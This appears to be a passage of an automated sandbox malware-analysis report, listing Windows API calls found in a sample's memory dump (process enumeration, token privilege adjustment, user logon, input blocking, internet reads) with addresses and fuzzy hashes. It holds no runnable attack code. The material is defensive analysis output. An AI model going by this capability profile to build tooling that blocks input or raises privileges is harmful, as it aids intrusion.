                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 39a13b1d2d750811c382c1085051e5827d1daaac2a832e0957b66c27ab4b88d8
                    • Instruction ID: e61a5d374e7b827d98071fb663a6adc569ebe84d7a6fee55eeb96d07b20e5db2
                    • Opcode Fuzzy Hash: 39a13b1d2d750811c382c1085051e5827d1daaac2a832e0957b66c27ab4b88d8
                    • Instruction Fuzzy Hash: 15E0C2B520070BCFDB344F25C814AD676D5EF083A4F80C439E985C2750EB78D880CBA0
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 006FF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 006FF15F
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 006FF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006FF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: c4a68931984d3900f7e57b30d7e7230b7456552a3cbb946f8c1c52b3e309e692
                    • Instruction ID: 2ecd67b075f7ccd223e7a794779b893063b3316c3de35f9e9a3eef104a95b64f
                    • Opcode Fuzzy Hash: c4a68931984d3900f7e57b30d7e7230b7456552a3cbb946f8c1c52b3e309e692
                    • Instruction Fuzzy Hash: 0D51AE715043009FD350EF24CC85A6BB7E9FF98710F144A2DF596932A1EB70EA08CB96
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006DEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: 9fd5648c5c855d9b4e17562c9d8e1c5111acc785ac8b4e3fe18ee8be17422e50
                    • Instruction ID: e70f68460c1e3c49ae9f0b6469805b7cf84122160a3e8afd8ff30e27c43cc52a
                    • Opcode Fuzzy Hash: 9fd5648c5c855d9b4e17562c9d8e1c5111acc785ac8b4e3fe18ee8be17422e50
                    • Instruction Fuzzy Hash: 30324675A007059FD728DF29C481AAAB7F1FF48310B15C46EE89ADB3A1E771E941CB44
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 006F26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006F270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 5031a4f0a66480ac0d64ae6abb80ce9cf989949054b097bf0f3f83ff1ad8506b
                    • Instruction ID: 109ff3fc482dc4b2d961ac5b2eb976ba1841114ab37c2b76a84260098dca6a36
                    • Opcode Fuzzy Hash: 5031a4f0a66480ac0d64ae6abb80ce9cf989949054b097bf0f3f83ff1ad8506b
                    • Instruction Fuzzy Hash: 9C41B37150420EBFEB20EB54DC95EBBB7BEEB41714F10406EF701E6240EA719E419E55
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006EB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006EB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 690bf7f732c89ff208a128b63df1d864c80e4063d9a75ae4d2baa3c2d41c360c
                    • Instruction ID: 15084a7b38f6d4ac8cacb8c5ed8acbf2c7411eeffb6631eb002787f0e68a7732
                    • Opcode Fuzzy Hash: 690bf7f732c89ff208a128b63df1d864c80e4063d9a75ae4d2baa3c2d41c360c
                    • Instruction Fuzzy Hash: 82217135A00618EFCB00EFA5D884EEEBBB9FF48310F1481A9E905AB351DB319916CB55
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                    • GetLastError.KERNEL32 ref: 006D8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 72b530c3460a995de2ef1d0db1b06149a13a37be5e9effd118ab7ce5304d4106
                    • Instruction ID: 2ca115de2409ed658cabdc247bb084b0925c82f36c1cdc81a802bd78311b4cd2
                    • Opcode Fuzzy Hash: 72b530c3460a995de2ef1d0db1b06149a13a37be5e9effd118ab7ce5304d4106
                    • Instruction Fuzzy Hash: 15118FB1814209AFE728AF54DC89D6BB7BEEF44710B20852EF85697641EF70BC418A64
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006E404B
                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 006E4088
                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006E4091
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 79987ef8281ce74f00dc1f78b988ebaea51b4f7c02d35bc32b3c90a515ac4376
                    • Instruction ID: 3a89c1dd16dc0a51120dbec563769e16d8f90afbf89263fa4580d6a540b8d098
                    • Opcode Fuzzy Hash: 79987ef8281ce74f00dc1f78b988ebaea51b4f7c02d35bc32b3c90a515ac4376
                    • Instruction Fuzzy Hash: 541170B1901328BEE7209BF9DC44FAFBBBCEB08750F004666FA04E7290C678594587A1
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E4C43
                    • FreeSid.ADVAPI32(?), ref: 006E4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 3a126db1774e4d415b3233e6a3d8e25049f90fae2106fbbe769f4f88db31587b
                    • Instruction ID: 479b98d87c46063f5c95bab92c504dad9ee16fddf49e15d9c870db363a795e7d
                    • Opcode Fuzzy Hash: 3a126db1774e4d415b3233e6a3d8e25049f90fae2106fbbe769f4f88db31587b
                    • Instruction Fuzzy Hash: 1CF04F75A1130CFFDF04DFF0DC89AAEB7BCEF08601F108569E501E2581D6745A048B54
                    APIs
                    • __time64.LIBCMT ref: 006E8B25
                      • Part of subcall function 006A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006E91F8,00000000,?,?,?,?,006E93A9,00000000,?), ref: 006A5443
                      • Part of subcall function 006A543A: __aulldiv.LIBCMT ref: 006A5463
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0ut
                    • API String ID: 2893107130-3725198356
                    • Opcode ID: 352922da08866050c9d3a18fdb648c4872745788ec9b9cc21f914dd15c485873
                    • Instruction ID: 13a5f69fe11141340fcfd7f01cb4fd9107d86984b2a74cdf61495ccfbe1dccf1
                    • Opcode Fuzzy Hash: 352922da08866050c9d3a18fdb648c4872745788ec9b9cc21f914dd15c485873
                    • Instruction Fuzzy Hash: 2721D5726256108FC329CF25D441A52B3E2EBA5311B288E6DD0E9CF2D0CB74BD05CB54
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 79e30b9dc9d875e316fae5a2c11d0f7f378ce3ded4bda6df2804776fcc56152e
                    • Instruction ID: 1f2f273b6b6f2820b661c4777bd8c059af24d29f146d84c526b34ece195a8acb
                    • Opcode Fuzzy Hash: 79e30b9dc9d875e316fae5a2c11d0f7f378ce3ded4bda6df2804776fcc56152e
                    • Instruction Fuzzy Hash: 7A229B74A00216CFDB24EF54C494ABEB7F2FF09300F148669E856AB351E776AD81CB91
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 006EC966
                    • FindClose.KERNEL32(00000000), ref: 006EC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 22af570ade54ef546b789ea6512b835b104ccb6240446a449e441f533bd4367e
                    • Instruction ID: 7af77731823e47205b097de23ee2a7f0ad24c8179c77cd8eb49689e593568185
                    • Opcode Fuzzy Hash: 22af570ade54ef546b789ea6512b835b104ccb6240446a449e441f533bd4367e
                    • Instruction Fuzzy Hash: 681165716106009FD710EF29D845A2AF7E5FF44324F04861EF9A6D7391DB34AC01CB95
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006F977D,?,0070FB84,?), ref: 006EA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006F977D,?,0070FB84,?), ref: 006EA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 7b789d03f421990cc14012743f40b72dae153e8782d47157bf9933ff1ce2b9a4
                    • Instruction ID: c62513357c02d405434e03eb240a0213bee879a1e178d8b877eb7cfc9a57bbfe
                    • Opcode Fuzzy Hash: 7b789d03f421990cc14012743f40b72dae153e8782d47157bf9933ff1ce2b9a4
                    • Instruction Fuzzy Hash: 77F0893554531DF7DB20AFA4CC48FEA776DBF09761F008255F908D6141DA70A940CBA5
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006D8851), ref: 006D8728
                    • CloseHandle.KERNEL32(?,?,006D8851), ref: 006D873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: cabd008867e27e0b9e3a4f61bf823be2bf34866110e98beb870ddbbd68bd6ce8
                    • Instruction ID: 616ded16a199a418c4e7c61b5d18f25252b9ef9f6e944a964d4ba4912cfcca4f
                    • Opcode Fuzzy Hash: cabd008867e27e0b9e3a4f61bf823be2bf34866110e98beb870ddbbd68bd6ce8
                    • Instruction Fuzzy Hash: 02E0B676010610EEE7752B60ED09D77BBAAEB057A0B25892DF4A684870DF62ACD0DB14
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006A8F97,?,?,?,00000001), ref: 006AA39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006AA3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 34fff5d788b9196fb0e52e232185f936c6f053ae5fd39e238c66c91be3fba776
                    • Instruction ID: 964457f0154f1e348b9bb5837cba2b4ad026fd720ea60b1d39ec0bb36a7df188
                    • Opcode Fuzzy Hash: 34fff5d788b9196fb0e52e232185f936c6f053ae5fd39e238c66c91be3fba776
                    • Instruction Fuzzy Hash: 57B09231058208EBCA102B91EC09B88BF68EB45AB2F408120F60D84860CF6654508A99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a227d1adfe87fc9ffa41de09f64804bed4111934d09e5e6d9b9dab0ca6a448fa
                    • Instruction ID: d5fb2196edd19bd23705becd7f3529629d94c4bbe26b574e8da6e60b9f98bd95
                    • Opcode Fuzzy Hash: a227d1adfe87fc9ffa41de09f64804bed4111934d09e5e6d9b9dab0ca6a448fa
                    • Instruction Fuzzy Hash: 66326961D69F014DD7276638D832376A25AAFB73D4F10D737F81AB5AA6EB2CC8834101
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: facaad7e99bd0b92179efba115b0fd642f7baf71ea6420d089f3853f44bf4a2c
                    • Instruction ID: 7178aa587a867baa789b72dbe64c2e3bcc2218de851055b7cbc59f79e238239e
                    • Opcode Fuzzy Hash: facaad7e99bd0b92179efba115b0fd642f7baf71ea6420d089f3853f44bf4a2c
                    • Instruction Fuzzy Hash: 51B1FF20E2AF514DD323963D8831336BA8CAFBB2D5F51D71BFC2674DA2EB2585834245
                    APIs
                    • BlockInput.USER32(00000001), ref: 006F4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: d9c7010cc6d7d100366a4d22cd35bc43353874889de1be12cccf3d0da8e41bb1
                    • Instruction ID: c02b78977b354d43017b730e997fe720624e09945198fc797e623f9165d758ca
                    • Opcode Fuzzy Hash: d9c7010cc6d7d100366a4d22cd35bc43353874889de1be12cccf3d0da8e41bb1
                    • Instruction Fuzzy Hash: 97E04F312402189FC710EF5AD844AABF7E9AF98760F04812AFD4AC7752DE71E941CBA4
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006E4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 352f1e5027bc8659deab2c121f3f56dc85118155ff6ed68dc7b37a0b6de6010d
                    • Instruction ID: dce42288fbc5b4e7f88cde35d87a04ce0e38f7813cbf035d8c1bf89002f35a40
                    • Opcode Fuzzy Hash: 352f1e5027bc8659deab2c121f3f56dc85118155ff6ed68dc7b37a0b6de6010d
                    • Instruction Fuzzy Hash: ABD09EF416A78579FC284B32AC1FFB6110BE3C1F91F945989720195AC2ACE5A855A039
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006D88D1), ref: 006D8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 247275395627417def5649869e5eed50297892ed30e6664007da84977c18c746
                    • Instruction ID: 31af07af6805603e2b0da2a8110cb0ce937df65b2914aa4b79fe3d012d760e86
                    • Opcode Fuzzy Hash: 247275395627417def5649869e5eed50297892ed30e6664007da84977c18c746
                    • Instruction Fuzzy Hash: 96D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 006C2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 416d74d785e7fa00c0632bdaee4eb2fdc1f82df6b1c126df7b6cb25d386f5f34
                    • Instruction ID: 600865cdfc480a97d732216231f59cda9256f22adb89f1b41929bfa520faea53
                    • Opcode Fuzzy Hash: 416d74d785e7fa00c0632bdaee4eb2fdc1f82df6b1c126df7b6cb25d386f5f34
                    • Instruction Fuzzy Hash: ACC04CF1C00109DBDB15DB90DA88DFE77BCAB05304F104155E101F2101D7749B448E71
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006AA36A
                    Memory Dump Source
